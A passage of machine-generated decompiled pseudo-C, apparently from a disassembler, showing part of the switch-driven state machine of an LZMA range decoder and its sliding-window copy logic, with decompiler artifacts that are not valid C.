                                                                                                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                                                                                                            											goto L89;
                                                                                                                                                                            										case 0xb:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            											L89:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            											L90:
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											goto L69;
                                                                                                                                                                            										case 0xc:
                                                                                                                                                                            											L100:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t335 = __ebp - 0x70;
                                                                                                                                                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t335;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            											goto L102;
                                                                                                                                                                            										case 0xd:
                                                                                                                                                                            											L37:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t122 = __ebp - 0x70;
                                                                                                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t122;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L39:
                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            												goto L48;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												goto L54;
                                                                                                                                                                            											}
                                                                                                                                                                            											L41:
                                                                                                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__eax = __eax << 8;
                                                                                                                                                                            											__eax = __eax + __ebx;
                                                                                                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edx;
                                                                                                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L39;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L37;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0xe:
                                                                                                                                                                            											L46:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L48:
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L46;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											L54:
                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                            											goto L55;
                                                                                                                                                                            										case 0xf:
                                                                                                                                                                            											L58:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L60:
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												L55:
                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            												goto L56;
                                                                                                                                                                            											}
                                                                                                                                                                            											L61:
                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L60;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L58;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 0x10:
                                                                                                                                                                            											L110:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t366 = __ebp - 0x70;
                                                                                                                                                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t366;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											goto L112;
                                                                                                                                                                            										case 0x11:
                                                                                                                                                                            											L69:
                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                            											L132:
                                                                                                                                                                            											 *(_t612 - 0x54) = _t605;
                                                                                                                                                                            											goto L133;
                                                                                                                                                                            										case 0x12:
                                                                                                                                                                            											goto L0;
                                                                                                                                                                            										case 0x13:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                            												goto L144;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            											goto L130;
                                                                                                                                                                            										case 0x14:
                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                            											L140:
                                                                                                                                                                            											 *(_t612 - 0x88) = _t533;
                                                                                                                                                                            											goto L1;
                                                                                                                                                                            										case 0x15:
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            											goto L121;
                                                                                                                                                                            										case 0x16:
                                                                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                                                                            											__eflags = __eax - 4;
                                                                                                                                                                            											if(__eax >= 4) {
                                                                                                                                                                            												_push(3);
                                                                                                                                                                            												_pop(__eax);
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                                                                                                            											__eax = __eax << 7;
                                                                                                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            											goto L145;
                                                                                                                                                                            										case 0x17:
                                                                                                                                                                            											goto L145;
                                                                                                                                                                            										case 0x18:
                                                                                                                                                                            											L146:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t484 = __ebp - 0x70;
                                                                                                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t484;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L148:
                                                                                                                                                                            											_t487 = __ebp - 0x48;
                                                                                                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            											__eflags =  *_t487;
                                                                                                                                                                            											goto L149;
                                                                                                                                                                            										case 0x19:
                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            												L120:
                                                                                                                                                                            												_t394 = __ebp - 0x2c;
                                                                                                                                                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            												__eflags =  *_t394;
                                                                                                                                                                            												L121:
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                            												_t401 = __ebp - 0x60;
                                                                                                                                                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            												__eflags =  *_t401;
                                                                                                                                                                            												goto L124;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            												L103:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													L109:
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                            													L113:
                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            														_t392 = __ebp - 0x2c;
                                                                                                                                                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            														__eflags =  *_t392;
                                                                                                                                                                            														goto L120;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														L112:
                                                                                                                                                                            														_t369 = __ebp - 0x48;
                                                                                                                                                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            														__eflags =  *_t369;
                                                                                                                                                                            														goto L113;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L110;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													L102:
                                                                                                                                                                            													_t339 = __ebp - 0x48;
                                                                                                                                                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            													__eflags =  *_t339;
                                                                                                                                                                            													goto L103;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L100;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                            											goto L109;
                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                            											L56:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                            											goto L80;
                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                            											L76:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            											}
                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            											__edx = _t275;
                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
